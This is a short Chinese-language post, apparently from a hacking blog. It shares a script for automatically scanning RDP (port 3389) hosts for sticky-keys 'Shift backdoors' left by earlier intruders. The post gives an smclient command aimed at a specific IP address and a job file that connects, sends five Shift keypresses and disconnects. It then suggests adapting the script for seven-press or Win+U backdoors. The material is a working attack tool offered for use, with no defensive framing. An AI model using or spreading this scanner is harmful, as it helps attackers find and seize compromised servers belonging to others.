3389的SHIFT后门自动扫描工具
以前夜火我介绍过不少shift相关的后门文章了:
今天来看看cloie的3389的SHIFT后门自动扫描工具:
首先3389的SHIFT后门极少,其次大部分SHIFT后门都加密
所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d
shift_backdoor.txt:
job
{
connect("","","",1,1);
sleep(2000);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
sleep(2000);
disconnect();
}
有些SHIFT后门被改成了按7次SHIFT,或者是WIN+U后门,改改shift_backdoor.txt把功能加进去即可
From:cloie